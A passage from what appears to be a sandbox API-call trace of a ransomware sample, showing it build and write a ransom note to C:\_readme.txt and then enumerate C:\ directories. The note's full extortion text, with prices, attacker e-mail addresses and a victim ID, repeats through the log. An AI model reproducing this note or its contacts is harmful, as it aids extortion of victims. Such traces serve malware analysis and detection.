Size=0x810) returned 0x99c9c68 [0090.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0090.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.643] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0090.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x806) returned 0x31cf750 [0090.644] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0090.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.644] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0090.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.645] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.645] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0090.645] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.647] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x3189d50 [0090.647] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x316f0d0 [0090.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x316f0d0, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.647] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31ce930 [0090.647] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.647] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.647] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.647] WriteFile (in: hFile=0x5cc, lpBuffer=0x31ce930*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x31ce930*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.648] CloseHandle (hObject=0x5cc) returned 1 [0090.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce930 | out: hHeap=0x680000) returned 1 [0090.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.661] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x6bdca8 [0090.661] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0090.661] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f560 [0090.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0090.661] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.661] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c) returned 0x31ef518 [0090.661] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0090.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f560 | out: hHeap=0x680000) returned 1 [0090.661] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0090.661] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.661] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.661] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x38) returned 0x31c7540 [0090.661] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f560 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f170 | out: hHeap=0x680000) returned 1 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.662] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0090.662] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0090.662] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x54) returned 0x99d9c28 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef810 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f560 | out: hHeap=0x680000) returned 1 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c7540 | out: hHeap=0x680000) returned 1 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.662] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175828 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f560 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f170 | out: hHeap=0x680000) returned 1 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef810 | out: hHeap=0x680000) returned 1 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0090.662] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175828 | out: hHeap=0x680000) returned 1 [0090.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0090.663] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x4e9ad440, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0090.663] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef810 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa8) returned 0x3152ab8 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f560 | out: hHeap=0x680000) returned 1 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef810 | out: hHeap=0x680000) returned 1 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0090.663] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x4ecf3280, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0090.663] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef810 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef810 | out: hHeap=0x680000) returned 1 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0090.663] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa95e3610, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa95e3610, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f560 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfc) returned 0x99dea38 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f2f8 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef810 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.663] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f170 | out: hHeap=0x680000) returned 1 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f560 | out: hHeap=0x680000) returned 1 [0090.664] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f560 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f368 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 